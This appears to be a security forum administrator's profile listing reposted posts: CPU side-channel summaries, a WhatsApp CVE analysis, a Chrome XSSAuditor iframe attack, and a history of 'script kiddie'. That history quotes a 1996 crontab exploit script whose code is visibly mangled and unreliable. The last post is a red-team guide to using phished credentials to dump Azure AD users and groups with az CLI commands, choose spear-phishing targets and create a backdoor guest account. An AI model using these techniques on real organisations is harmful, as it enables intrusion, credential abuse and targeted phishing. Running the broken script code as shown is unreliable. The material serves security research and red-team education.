
Nytro

Administrators
  • Content Count: 16385
  • Joined
  • Last visited
  • Days Won: 262

Nytro last won the day on May 17.
Nytro had the most liked content!

Community Reputation: 3667 (Excellent)

About Nytro
  • Rank: Administrator
  • Birthday: 03/11/1991

Recent Profile Visitors: 25725 profile views
  1. I added a new RSS feed; you can find it on /forum, bottom right. It's called "Technical Forums" and it excludes Offtopic and a few other sections. It might be useful.
  2. I enabled a feature (found by accident) that lets you choose how the forum is displayed. I think it's fairly easy to spot (on /forum).
  3. Don't rely on university to learn security. There are a few master's programs, but I don't know of anything at the bachelor's level. Do a computer science degree; it will help you pick up something from several different fields. Search the forum for posts about choosing a university. In the meantime, learn on your own and play CTFs; the Internet is full of resources (see the Tutoriale Engleza section here on the forum).
  4. Hey folks, time for some good ol' fashioned investigation! Open Rights Group & Who Targets Me are monitoring the European elections: GDPR breaches, privacy infringements, the works! They released a browser extension that records every political ad served to users on Facebook, including the data used to target individuals. If you use Facebook, install the extension and browse your Facebook feed freely. If you aren't on Facebook, help us out by spreading the word. No additional personal information is recorded. If you have any concerns about this, ping me! We can pool all our questions and I'll send them an open letter from the Security Espresso community. This information is via our good friends at Asociatia pentru Tehnologie si Internet. https://whotargets.me/en/ https://www.openrightsgroup.org/campaigns/who-targets-me-faq Via: https://www.facebook.com/secespresso/
  5. Adventures in Video Conferencing - Natalie Silvanovich - INFILTRATE 2019. INFILTRATE 2020 will be held April 23-24 in Miami Beach, Florida: infiltratecon.com
  6. System Down: A systemd-journald Exploit. Read the advisory; accompanying exploit: system-down.tar.gz. Source: https://www.qualys.com/research/security-advisories/
  7. RIDL and Fallout: MDS attacks

Attacks on the newly disclosed "MDS" hardware vulnerabilities in Intel CPUs. The RIDL and Fallout speculative execution attacks allow attackers to leak confidential data across arbitrary security boundaries on a victim system, for instance compromising data held in the cloud or leaking your information to malicious websites. Our attacks leak data by exploiting the newly disclosed Microarchitectural Data Sampling (MDS) side-channel vulnerabilities in Intel CPUs. Unlike existing attacks, our attacks can leak arbitrary in-flight data from CPU-internal buffers (Line Fill Buffers, Load Ports, Store Buffers), including data never stored in CPU caches. We show that existing defenses against speculative execution attacks are inadequate, and in some cases actually make things worse. Attackers can use our attacks to obtain sensitive data despite mitigations, due to vulnerabilities deep inside Intel CPUs.

Source: https://mdsattacks.com/
  8. ZombieLoad Attack

Watch out! Your processor resurrects your private browsing history and other sensitive data. After Meltdown, Spectre, and Foreshadow, we discovered more critical vulnerabilities in modern processors. The ZombieLoad attack allows stealing sensitive data and keys while the computer accesses them. While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs. These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys. The attack not only works on personal computers but can also be exploited in the cloud. Make sure to get the latest updates for your operating system!

Source: https://zombieloadattack.com/
  9. The NSO WhatsApp Vulnerability – This is How It Happened

May 14, 2019

Earlier today the Financial Times reported that there is a critical vulnerability in the popular WhatsApp messaging application and that it is actively being used to inject spyware into victims' phones. According to the report, attackers only need to issue specially crafted VoIP calls to the victim in order to infect it, with no user interaction required for the attack to succeed. As WhatsApp is used by 1.5bn people worldwide, on both Android phones and iPhones, the messaging and voice application is known to be a popular target for hackers and governments alike. Immediately after the publication went live, Check Point Research began analyzing the details of the now-patched vulnerability, referred to as CVE-2019-3568. Here is the first technical analysis to explain how it happened.

Technical Details

Facebook's advisory describes it as a "buffer overflow vulnerability" in the SRTCP protocol, so we started by patch-diffing the new WhatsApp version for Android (v2.19.134, 32-bit program) in search of a matching code fix. Soon enough we stumbled upon two code fixes in the SRTCP module:

Size Check #1

The patched function is a major RTCP handler function, and the added fix can be found right at its start. The added check verifies the length argument against a maximal size of 1480 bytes (0x5C8). During our debugging session we confirmed that this is indeed a major function in the RTCP module and that it is called even before the WhatsApp voice call is answered.

Size Check #2

In the flow between the two functions we can see that the same length variable is now used twice during the newly added sanitation checks (marked in blue):

  • Validation that the packet's length field doesn't exceed the length.
  • An additional check that the length is once again <= 1480, right before a memory copy.

As one can see, the second check includes a newly added log string that specifically says it is a sanitation check to avoid a possible overflow.

Conclusion

WhatsApp rolled their own implementation of the complex SRTCP protocol, and it is implemented in native code, i.e. C/C++ and not Java. During our patch analysis of CVE-2019-3568, we found two newly added size checks that are explicitly described as sanitation checks against memory overflows when parsing and handling network packets in memory. As the entire SRTCP module is pretty big, there could be additional patches that we've missed. In addition, judging by the nature of the fixed vulnerabilities and the complexity of the module in question, there is also a fair chance that additional unknown parsing vulnerabilities remain in this module.

Source: https://research.checkpoint.com/the-nso-whatsapp-vulnerability-this-is-how-it-happened/
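To make the nature of the fix concrete, here is a minimal sketch of the kind of length sanitation described above, written in Python purely for illustration. The real patch lives in WhatsApp's native C/C++ SRTCP module; only the 1480-byte (0x5C8) bound comes from the analysis, while the function name and packet layout here are hypothetical:

import struct

MAX_RTCP_PAYLOAD = 1480  # 0x5C8, the bound enforced by the patched checks

def handle_rtcp_packet(packet: bytes) -> bytes:
    # Hypothetical layout: a 4-byte header whose last 2 bytes encode
    # the declared payload length, followed by the payload itself.
    if len(packet) < 4:
        raise ValueError("truncated packet")
    declared_len = struct.unpack(">H", packet[2:4])[0]

    # Size check #1: reject oversized input before any further processing,
    # analogous to the check at the start of the patched RTCP handler.
    if declared_len > MAX_RTCP_PAYLOAD:
        raise ValueError("RTCP payload exceeds 1480 bytes")

    # Validate that the declared length does not exceed the data we have.
    if declared_len > len(packet) - 4:
        raise ValueError("declared length exceeds actual packet size")

    buffer = bytearray(MAX_RTCP_PAYLOAD)
    # Size check #2: re-check the bound right before the memory copy,
    # mirroring the second patched check described above.
    if declared_len <= MAX_RTCP_PAYLOAD:
        buffer[:declared_len] = packet[4:4 + declared_len]
    return bytes(buffer[:declared_len])

The missing versions of these two checks are what would have let a crafted VoIP packet overflow a fixed-size buffer.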
  10. Adversarial Examples for Electrocardiograms

Xintian Han, Yuxuan Hu, Luca Foschini, Larry Chinitz, Lior Jankelson, Rajesh Ranganath (submitted on 13 May 2019)

Among all physiological signals, the electrocardiogram (ECG) has seen some of the largest expansion in both medical and recreational applications with the rise of single-lead versions. These versions are embedded in medical devices and wearable products such as the injectable Medtronic Linq monitor, the iRhythm Ziopatch wearable monitor, and the Apple Watch Series 4. Recently, deep neural networks have been used to classify ECGs, outperforming even physicians specialized in cardiac electrophysiology. However, deep learning classifiers have been shown to be brittle to adversarial examples, including in medical-related tasks. Yet traditional attack methods such as projected gradient descent (PGD) create examples that introduce square wave artifacts that are not physiological. Here, we develop a method to construct smoothed adversarial examples. We chose to focus on models learned on the data from the 2017 PhysioNet/Computing-in-Cardiology Challenge for single-lead ECG classification. For this model, we utilized a new technique to generate smoothed examples that produce signals which are 1) indistinguishable to cardiologists from the original examples and 2) incorrectly classified by the neural network. Further, we show that adversarial examples are not rare. Deep neural networks that have achieved state-of-the-art performance fail to classify smoothed adversarial ECGs that look real to clinical experts.

Subjects: Signal Processing (eess.SP); Cryptography and Security (cs.CR); Machine Learning (cs.LG); Machine Learning (stat.ML)
Cite as: arXiv:1905.05163 [eess.SP] (or arXiv:1905.05163v1 [eess.SP] for this version)
Submission history: [v1] Mon, 13 May 2019 17:47:25 UTC (1,236 KB), from Xintian Han

Source: https://arxiv.org/abs/1905.05163
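For reference, here is a minimal sketch of the vanilla L-infinity PGD baseline the abstract contrasts against, in NumPy with a toy differentiable model. All names (pgd_attack, grad_fn, epsilon, the logistic-regression toy) are illustrative, not from the paper; the paper's actual contribution is smoothing such perturbations so they look physiological rather than blocky:

import numpy as np

def pgd_attack(x, y, grad_fn, epsilon=0.1, step=0.02, iters=40):
    """Basic L-infinity PGD: ascend the loss gradient, then project
    the perturbation back into the epsilon-ball around x."""
    x_adv = x.copy()
    for _ in range(iters):
        g = grad_fn(x_adv, y)                              # gradient of loss w.r.t. input
        x_adv = x_adv + step * np.sign(g)                  # gradient-sign ascent step
        x_adv = np.clip(x_adv, x - epsilon, x + epsilon)   # project back into the ball
    return x_adv

# Toy "model": logistic regression with fixed weights w; the gradient of
# cross-entropy loss w.r.t. the input has the closed form (p - y) * w.
w = np.array([0.5, -1.2, 0.8])
def grad_fn(x, y):
    p = 1.0 / (1.0 + np.exp(-x @ w))
    return (p - y) * w

x0 = np.array([1.0, 0.2, -0.5])
adv = pgd_attack(x0, y=1.0, grad_fn=grad_fn)

The sign() step is exactly what produces the square-wave perturbations the authors call out as non-physiological on ECG traces.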
  11. Chrome switching the XSSAuditor to filter mode re-enables old attack

Fri 10 May 2019

Recently, Google Chrome changed the default mode for their Cross-Site Scripting filter XSSAuditor from block to filter. This means that instead of blocking the page load completely, XSSAuditor will now continue rendering the page but modify the bits that have been detected as an XSS issue. In this blog post, I will argue that the filter mode is a dangerous approach, by re-stating the arguments from the whitepaper titled X-Frame-Options: All about Clickjacking? that I co-authored with Mario Heiderich in 2013. After that, I will elaborate on XSSAuditor's other shortcomings and revisit the history of back-and-forth in its default settings. In the end, I hope to convince you that XSSAuditor's contribution is not just negligible but actually negative, and that it should therefore be removed completely.

JavaScript à la Carte

When you allow websites to frame you, you basically give them full permission to decide which parts of your very own JavaScript can be executed and which cannot. That sounds crazy, right? So, let's say you have three script blocks on your website. The website that frames you doesn't mind two of them - but really hates the third one. Maybe a framebuster, maybe some other script relevant for security purposes. So the website that frames you just turns that one script block off - and leaves the other two intact. Now how does that work? Well, it's easy. All the framing website is doing is using the browser's XSS filter to selectively kill JavaScript on your page. This used to work in IE some years ago but doesn't anymore - yet it still works perfectly fine in Chrome.

Let's have a look at an annotated code example. Here is the evil website, framing your website on example.com and sending something that looks like an attempt to XSS you! Only that you don't have any XSS bugs. The injection is fake - and resembles a part of the JavaScript that you actually use on your site:

<iframe src="//example.com/index.php?code=%3Cscript%20src=%22/js/security-libraries.js%22%3E%3C/script%3E"></iframe>

Now we have your website. The content of the code parameter above is part of your website anyway - no injection here, just a match between URL and site content:

<!doctype html>
<h1>HELLO</h1>
<script src="/js/security-libraries.js"></script>
<script>
// assumes that the libraries are included
</script>

The effect is compelling. The load of the security libraries will be blocked by Chrome's XSSAuditor, violating the assumption in the following script block, which will run as usual.

Existing and Future Countermeasures

So, as we see, defaulting to filter was a bad decision, and it can be overridden with the X-XSS-Protection: 1; mode=block header. You could also disallow websites from putting you in an iframe with X-Frame-Options: DENY, but that still leaves an attack vector, as your website could be opened as a top-level window. (The Cross-Origin-Opener-Policy will help, but does not yet ship in any major browser.) A short sketch of setting these headers follows at the end of this post. Surely, Chrome might fix that one bug and stop exposing onerror from internal error pages. But that's not enough.

Other shortcomings of the XSSAuditor

XSSAuditor has numerous problems in detecting XSS. In fact, there are so many that the Chrome Security Team does not treat bypasses as security bugs in Chromium. For example, the XSSAuditor scans parameters individually and thus allows for easy bypasses on pages that have multiple injection points, as an attacker can just split their payload in half.

Furthermore, XSSAuditor is only relevant for reflected XSS vulnerabilities. It is completely useless against other XSS vulnerabilities like persistent XSS, mutation XSS (mXSS), or DOM XSS. DOM XSS has become more prevalent with the rise of JavaScript libraries and frameworks such as jQuery or AngularJS. In fact, a 2017 research paper about exploiting DOM XSS through so-called script gadgets discovered that XSSAuditor is easily bypassed in 13 out of 16 tested JS frameworks.

History of XSSAuditor defaults

Here's a rough timeline:

2010 - Paper "Regular expressions considered harmful in client-side XSS filters" published, outlining the design of the XSSAuditor. Chrome ships it with the default set to filter.
2016 - Chrome switches to block due to the attacks with non-existing injections.
November 2018 - Chrome error pages can be observed in an iframe, due to the onerror event being triggered twice, which allows for cross-site leak attacks (https://github.com/xsleaks/xsleaks/wiki/Browser-Side-Channels#xss-filters).
January 2019 (hitting Chrome stable in April 2019) - XSSAuditor switches back to filter.

Conclusion

Taking all things into consideration, I'd highly suggest removing the XSSAuditor from Chrome completely. In fact, Microsoft announced last year that they'd remove the XSS filter from Edge. Unfortunately, a suggestion to retire XSSAuditor initiated by the Google Security Team was eventually dismissed by the Chrome Security Team.

This blog post does not represent the position of my employer. Thanks to Mario Heiderich for providing valuable feedback: supporting arguments and useful links are his. Mistakes are all mine.

Source: https://frederik-braun.com/xssauditor-bad.html
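As promised in the countermeasures section above, here is a minimal sketch of a server sending the two response headers the post recommends (X-XSS-Protection: 1; mode=block and X-Frame-Options: DENY), using only the Python standard library. The handler and page body are illustrative, not from the post:

from http.server import BaseHTTPRequestHandler, HTTPServer

class HardenedHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"<!doctype html><h1>HELLO</h1>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        # Force the XSS filter back into block mode: on detection the page
        # load is aborted instead of being rendered with scripts removed.
        self.send_header("X-XSS-Protection", "1; mode=block")
        # Refuse framing entirely, so a hostile parent page cannot use the
        # filter to selectively disable scripts in an iframe.
        self.send_header("X-Frame-Options", "DENY")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), HardenedHandler).serve_forever()

As the post notes, DENY still leaves the top-level-window vector open, so this mitigates rather than eliminates the problem.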
  12. dsync - an IDAPython plugin that synchronizes decompiled and disassembled code views. Please refer to the comments in the source code for more details. Requires IDA 7.2. Source: https://github.com/patois/dsync
  13. AntiFuzz: Impeding Fuzzing Audits of Binary Executables

Authors: Emre Güler, Cornelius Aschermann, Ali Abbasi, and Thorsten Holz, Ruhr-Universität Bochum

Abstract: A general defense strategy in computer security is to increase the cost of successful attacks in both computational resources as well as human time. In the area of binary security, this is commonly done by using obfuscation methods to hinder reverse engineering and the search for software vulnerabilities. However, recent trends in automated bug finding changed the modus operandi. Nowadays it is very common for bugs to be found by various fuzzing tools. Due to ever-increasing amounts of automation and research on better fuzzing strategies, large-scale, dragnet-style fuzzing of many hundreds of targets becomes viable. As we show, current obfuscation techniques are aimed at increasing the cost of human understanding and do little to slow down fuzzing. In this paper, we introduce several techniques to protect a binary executable against an analysis with automated bug finding approaches that are based on fuzzing, symbolic/concolic execution, and taint-assisted fuzzing (commonly known as hybrid fuzzing). More specifically, we perform a systematic analysis of the fundamental assumptions of bug finding tools and develop general countermeasures for each assumption. Note that these techniques are not designed to target specific implementations of fuzzing tools, but address general assumptions that bug finding tools necessarily depend on. Our evaluation demonstrates that these techniques effectively impede fuzzing audits, while introducing a negligible performance overhead. Just as obfuscation techniques increase the amount of human labor needed to find a vulnerability, our techniques render automated fuzzing-based approaches futile.

Open Access Media: USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access.

Source: https://www.usenix.org/conference/usenixsecurity19/presentation/guler
  14. The Origin of Script Kiddie - Hacker Etymology

12 May 2019

TL;DR: The term script kiddie probably originated around 1994, but the first public record is from 1996. (watch on YouTube)

Introduction

In my early videos I used the slogan "don't be a script kiddie" in the intro. And quite some time ago I got the following YouTube comment about it: Is "don't be a script kiddie" a reference to Mr. Robot? Or is it already a thing in general? I think it would be interesting to look for the origin of the term script kiddie, and at the same time it gives us an excuse to look into the past, to better understand what our community is built upon and somewhat honour and remember it. I wish I were old enough to have experienced that time myself to tell you first-hand stories, but unfortunately I was born in the early 90s, and so I'm merely an observer and explorer of the publicly available historical records. But there is fascinating stuff out there that I want to share with you.

Phrack

The first resource I wanted to check is Phrack. Phrack is probably the longest-running ezine, as it was started in 1985 by Taran King and Knight Lightning. (source: http://www.erik.co.uk/hackerpix/) I highly encourage you to just randomly click around through those old issues and read some random articles. You will find stuff about operating systems and various technologies you might have never heard about - because they don't exist anymore. But you also find traces of the humans behind all this through the Phrack Pro-Philes and other articles. Maybe check out the famous hacker manifesto from 1986 - The Conscience of a Hacker. It was written by a teenager, calling himself The Mentor, who probably never thought that his rage-induced philosophical writing would go on to influence a whole generation of hackers. But it becomes even more fascinating with the privilege of being here in the future, right now, and looking back. I found a talk from 2002 by The Mentor, and he is now a grown man reflecting on his experience about this. It's emotional and human. And in the end this is what the hacker culture is. It's full of humans with complex emotions; we shouldn't forget that. (Watch on YouTube) Anyway, I'm getting really distracted here. Back to script kiddie research.

The oldest occurrence of script kiddie we can find is from issue 54, released in 1998, articles 9 and 11: [...] when someone posts (say) a root hole in Sun's comsat daemon, our little cracker could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable boxes. It should be noted that this is SCRIPT KIDDIE behavior. And the other is a sarcastic comment about rootshell.com being hacked and them handing over data to law enforcement: Lets give out scripts that help every clueless script kiddie break into thousands of sites worldwide. then narc off the one that breaks into us. So this issue is from 1998, which is already the late 90s, but I'm sure there have to be earlier occurrences. Wikipedia is often pretty good with information and references, but unfortunately there are only links going back to the 2000s.

Yet Another Bulletin Board System

Then I looked at the textfiles.com archive, which is run by Jason Scott. This is a huuuge archive of old zines, bulletin boards, mailing lists, and more. And so I started to search through that, and indeed I found some interesting traces from around 1993/1994 in a BBS called yabbs - yet another bulletin board system, created by Alex Wetmore in 1991 at Carnegie Mellon.
The first interesting find is from October 1993: Enjoy your K-Rad elite kodez kiddies. Here the term kiddie is not prefixed with script, and I'm not sure if it's "elite code, kiddies" or elite "code kiddies". But code and script are almost synonymous, and it seems to be used in a very similar derogatory way as the modern terminology. Then in June 1994 there is this message: Codez kiddies just don't seem to understand that those scripts had to come from somwhere. Hacking has fizzled down to kids running scripts to show off at a 2600 meet. We have again a reference to "codez kiddies", but now the term script also starts to appear in the same sentence. And then in July 1994 it got combined to: Even 99% of the wanker script codez kiddies knows enough to not run scripts on the Department of Defense. Isn't this fascinating! I believe that 1994 is the year when the term script kiddie started to appear. But this example is still not 100% the modern term...

The First Script Kiddie

The earliest usage of literally script kiddie I was only able to find in an exploit from 1996:

[r00t.1] [crongrab] [public release]

Crontab has a bug. You run crontab -e, then you goto a shell, relink the temp file that crontab is having you edit, and presto, it is now your property. This bug has been confirmed on various versions of OSF/1, Digital UNIX 3.x, and AIX 3.x. If, while running my script, you somehow manage to mangle up your whole system, or perhaps do something stupid that will place you in jail, then neither I, nor sirsyko, nor the other fine folks of r00t are responsible. Personally, I hope my script eats your cat and causes swarms of locuses to decend down upon you, but I am not responsible if they do. --kmem.

[-- Script kiddies cut here -- ]
#!/bin/sh
# This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996
# This crappy exploit script was written by kmem.
# and remember if ur not owned by r00t, ur not worth owning
#
# usage: crongrab
echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others???
echo if this did not work on OSF/1 read the comments -- it is easy to fix.
if [ $# -ne '2' ]; then
  echo "usage: $0 "
  exit
fi
HI_MUDGE=$1
YUMMY=$2
export HI_MUDGE
UNAME=`uname`
GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1"
#SETUP the awk script
cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1 sed -f aix.sed .r00t-tmp1 > $YUMMY
elif [ $UNAME = "OSF1" ]; then
  #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines
  crontab -e 2>.r00t-tmp1
  awk -f 1.awk .r00t-tmp1 >$YUMMY
  # FOR PRE DIGITAL UNIX 3.X machines uncomment this line
  #crontab -l 2>&1 > $YUMMY
else
  echo "Sorry, dont know your OS. But you are a bright boy, read the skript and"
  echo "Figger it out."
  exit
fi
echo "Checkit out - $YUMMY"
echo "sirsyko and kmem kickin it out."
echo "r00t"
#cleanup our mess
crontab -r
VISUAL=$oldvis
EDITOR=$oldedit
HI_MUDGE=''
YUMMY=''
export HI_MUDGE
export YUMMY
export VISUAL
export EDITOR
rm -f $GIRLIES
[-- Script kiddies cut here -- ]

THERE IT IS! This bug was discovered by sirsyko on Thursday, March 21st, 1996, just after midnight. I guess nothing has changed with hacking into the night. And this exploit script was written by kmem. You know what's cool? With a bit of digging I actually found party pictures from around 1996/97 of kmem and sirsyko. I'm so grateful that there was some record keeping through pictures from that time, which takes away some of the mysticism that surrounds those early hackers - they look like normal dudes!
But anyway, is this really the first time that somebody used the term script kiddie? Is this where it all started? Well... when I was asking around, somebody reminded me of Cunningham's Law: the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer. So... I DECLARE THIS EXPLOIT TO BE THE FIRST USAGE OF THE TERM SCRIPT KIDDIE! IT'S. A. FACT!

Epilogue

I'm aware that a lot of the hacking culture happened in private boards, forums, and chat rooms. But maybe somebody out there has old (non-)public IRC logs and can grep over them for us. I think it would be really cool to find more traces of the evolution of this term. Also, I would LOVE to hear the story behind any exploit from the 90s. How did you find it, did you share it, how did you learn what you knew, what kind of research did you do yourself, who was influential to you, did anybody steal your bug, were there bug collisions, what was it like to experience a buffer overflow for the first time, etc. I think there are a lot of fascinating stories hidden behind those zines and exploits from that time, and they haven't been told yet. I don't want them to be forgotten - please share your story.

Update

I was just sent a talk by Alex Ivanov and @JohnDunlap2 from HOPE 2018. They saw my tweet from 2018 about the exploit from 1996, but they go even further! A lot of info about k-rad, the first 1337 speak, etc.

Source: https://liveoverflow.com/the-origin-of-script-kiddie-hacker-etymology/
  15. Red Teaming Microsoft: Part 1 – Active Directory Leaks via Azure

Mike Felch //

With so many Microsoft technologies, services, integrations, applications, and configurations, it can be quite difficult just to manage everything. Now imagine trying to secure an environment that goes well beyond the perimeter. While moving everything to a cloud provider can provide amazing returns in scalability, functionality, and even savings, it can also create major blind spots. Over the past year, I have been looking into ways to target organizations that utilize Microsoft as their cloud provider. I hope to release a number of different techniques that have been extremely beneficial in uncovering these blind spots, much like the research Beau Bullock (@dafthack) and I did when we focused our scope on Google.

I won't begin to mislead you: I am no Microsoft expert. In fact, the more I read about the products and services, the more I felt lost. While over the past year I've been able to maneuver through and bend these technologies in order to better target organizations from a red team perspective, I struggled trying to understand many different concepts. What is the default configuration for this? Is this provided by default? Is this syncing with everything? If I make changes here, do they propagate back? Why not? The list goes on and on. When I've shared some of these techniques privately, it was inevitable that a question would immediately follow. While I feel bringing a problem without a solution is irresponsible, there may be times like now where solutions aren't black and white. My advice is to know your environment, know your technologies, and if you aren't sure, then reach out to your service provider so you can be sure.

The Microsoft Landscape

So you've been running Microsoft Active Directory and Exchange on-prem for years but want to quickly deploy Microsoft Office to your employees while also providing them with access to a webmail portal, Sharepoint, and SSO for some internal applications. Somewhere along the way you decided to migrate to Office 365, and everything works well! All your users can authenticate with their network credentials and their email works great! Would you still consider yourself an on-prem organization, or are you in the infamous cloud now? Maybe you took a hybrid approach and did both. Microsoft supports an amazing number of integrations, but how do you know if you are managing everything correctly?

A Hypothetical Complex Situation

For managing users on-prem there's the traditional Microsoft AD. For managing users in cloud services you could leverage Azure AD. For mail there's Exchange on-prem, but you could always move email to Exchange Online. If you want the full suite of Microsoft Office there's Office 365, but I think that routes through Exchange Online in a Microsoft multi-tenant environment anyhow, so you could technically be using both but paying for one. Since you paid for Office 365 Business, you were also provided a number of services like Skype and OneDrive, despite using GDrive or Box for corporate file sharing. You enroll in a multi-factor solution with SMS tokens as the default delivery mechanism, but for some reason your users can still authenticate with Outlook without needing MFA... weird... (major thanks to Microsoft EWS). Overall, everything just works, and for that we have to thank Azure AD Connect... or is it Azure AD Synchronization Services... or are we still running old-school DirSync with Forefront Identity Manager?
Whatever it is, it's working and that's all that matters!

So... What's the Big Deal?

A number of problems are created in the situation just illustrated, and there is very little a blue team can do to defend against or respond to a number of different attacks, ranging from dumping Active Directory remotely to bypassing and even hijacking multi-factor authentication for users. Understanding who is who within an organizational department is typically done in the reconnaissance phase of an engagement, through third-party services like LinkedIn or other OSINT techniques. If you are on the internal network, then revisiting this step is crucial because you need to understand deeper details of the organization, like what groups are configured and who the members of those groups are. This is vital to being able to successfully pivot to relevant machines and target users based on their access so that escalation can be accomplished. But what if you aren't on the internal network but still need to determine who to target? Even better, what if the target gems of the organization are hosted in the cloud and you never actually have to touch the internal network? With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc.) with Active Directory (on-prem or in Azure), then an attacker is one credential away from being able to leak your entire Active Directory structure, thanks to Azure AD.

Step 1) Authenticate to your webmail portal (i.e. https://webmail.domain.com/)
Step 2) Change your browser URL to: https://azure.microsoft.com/
Step 3) Pick the account from the active sessions
Step 4) Select Azure Active Directory and enjoy!

This creates a number of bad situations. For instance, if we were able to export all the users and groups, we would have a very nice list of employees and the groups they are a part of. We can also learn what group we need to land in for VPN, domain administration, database access, cloud servers, or financial data. What's also nice about Azure AD is that it holds the device information for each user, so we can see if they are using a Mac, a Windows machine, or an iPhone, along with the version information (i.e. Windows 10.0.16299.0). As if all this wasn't great already, we can also learn about all the business applications with their endpoints, service principal names, other domain names, and even the virtual resources (i.e. virtual machines, networks, databases) that a user might have access to.

But Wait, There's More!

An added benefit to authenticating to the Azure portal as a regular user is that you can create a backdoor... err... I mean a "Guest" account. How super convenient!

Step 1) Click "Azure Active Directory"
Step 2) Click "Users" under the Manage section
Step 3) Click "New Guest User" and invite yourself

Depending on their configuration, it may or may not sync back to the internal network. In fact, while creating guest accounts is on by default, I've only verified one customer where Azure AD Connect was a bi-directional sync allowing guest accounts to authenticate, enroll a multi-factor device, and VPN internally. This is an important configuration component for you to understand, since it can create a bad day.

Azure for Red Teams

Accessing the Azure portal through the web browser is great and has many awesome advantages, but I have yet to find a way to export the information directly.
I started to write a tool that would authenticate and do it in an automated fashion, but it felt cumbersome, and I knew that with all of these awesome technologies tied together, Microsoft had solved this problem for me. There were a number of solutions I came across; some of them are:

Azure CLI (AZ CLI)
Being a Linux user, I naturally gravitated towards AZ CLI. Partially because I pipe as much data into one-liners as possible, and partially because I over-engineer tools in .NET. Using AZ CLI is a quick and easy way to authenticate against the OAUTH for Azure while also quickly exporting the raw data. In this post, we will focus on this solution.

Azure Powershell
With the rise of awesome Powershell tools like Powershell Empire and MailSniper, I'm amazed that Azure Powershell hasn't made its way into one of these tools. There is a massive number of Active Directory cmdlets to interact with. To get started, simply install Azure RM Powershell, then run: Connect-AzureRmAccount

Azure .NET
I am one of those weird nerds who grew up on Linux but wrote C# for a significant portion of my career. Because of this, having an Azure .NET library to interact with Active Directory is encouraging. I didn't dig too much into these libraries, but from a high level it seems they are some sort of wrapper for the Active Directory Graph API.

Let's Dig In!

As I previously mentioned, we will focus on interacting with Azure using AZ CLI. In order to get started, we have to first establish an active session with Azure. On red teams where the engagement involves an organization using Microsoft or Google services, I rarely try to go straight to a shell on the internal network. I will normally use a tool I wrote called CredSniper to phish credentials and multi-factor tokens, then just authenticate as that user in pursuit of sensitive emails, files, access, information, and VPN. With that presupposition, we will assume valid credentials were already obtained somehow.

Install AZ CLI

You will need to add the Microsoft source to apt (assuming Linux), install the Microsoft signing key, and then install Azure CLI:

AZ_REPO=$(lsb_release -cs)
echo "deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo apt-get install apt-transport-https
sudo apt-get update && sudo apt-get install azure-cli

Authentication via Web Session

After everything is installed correctly, you will need to create a session to Azure using the credentials you already obtained. The easiest way to do that is by authenticating using ADFS or OWA in a normal browser, then:

az login

This will generate the OAUTH tokens locally, open a browser tab to the authentication page, and let you select an account from the ones you are already authenticated with. Once you select the account, the local OAUTH tokens will be validated by the server and you won't have to do that again unless they expire or get destroyed. You can also pass the --use-device-code flag, which will generate a token you provide to https://microsoft.com/devicelogin.

Dumping Users

Now on to my favorite part! There have been numerous techniques for extracting the GAL previously researched, such as using the FindPeople and GetPeopleFilter web service methods in OWA.
These techniques have been an excellent resource for red teamers, but they definitely have their limitations on what data is available, how long it takes to enumerate users, how loud they are due to the number of web requests required, and how they occasionally break. With AZ CLI, it's super easy to extract all the directory information for each user. In the examples below, I apply a JMESPath filter to extract the data I care about. I can also export as a table, JSON, or in TSV format!

All Users

az ad user list --output=table --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}'

Specific User

If you know the UPN of the target account, you can retrieve specific accounts by passing in the --upn flag. This is convenient if you want to dig into the Active Directory information for a particular account. In the example below, you will notice I used the JSON format instead of the table output.

az ad user list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --upn='<upn>'

Dumping Groups

My next favorite function is the ability to dump groups. Understanding how groups are used within an organization can provide specific insight into the areas of the business, the users, and who the admins are. AZ CLI provides a few useful commands that can assist here.

All Groups

The first thing I usually do is just export all the groups. Then I can grep around for certain keywords: Admin, VPN, Finance, Amazon, Azure, Oracle, VDI, Developer, etc. (a small post-processing sketch follows at the end of this post). While there is other group metadata available, I tend to just grab the name and description.

az ad group list --output=json --query='[].{Group:displayName,Description:description}'

Specific Group Members

Once you have reviewed the groups and cherry-picked the interesting ones, it's useful to dump the group members next. This will give you an excellent list of targets that are a part of the interesting groups - prime targets for spear phishing! Contrary to popular opinion, I have personally found that technical ability and title do not lower the likelihood that an intended target will hand over their credentials (and even their MFA token). In other words, everyone is susceptible, so I usually target back-end engineers and devops teams because they tend to have the most access, plus I can usually remain external to the network yet still access private GitHub/GitLab code repositories for creds, Jenkins build servers for shells, OneDrive/GDrive file shares for sensitive data, Slack teams for sensitive files, and a range of other third-party services. Once again, why go internal if you don't have to?

az ad group member list --output=json --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}' --group='<group name>'

Dumping Applications & Service Principals

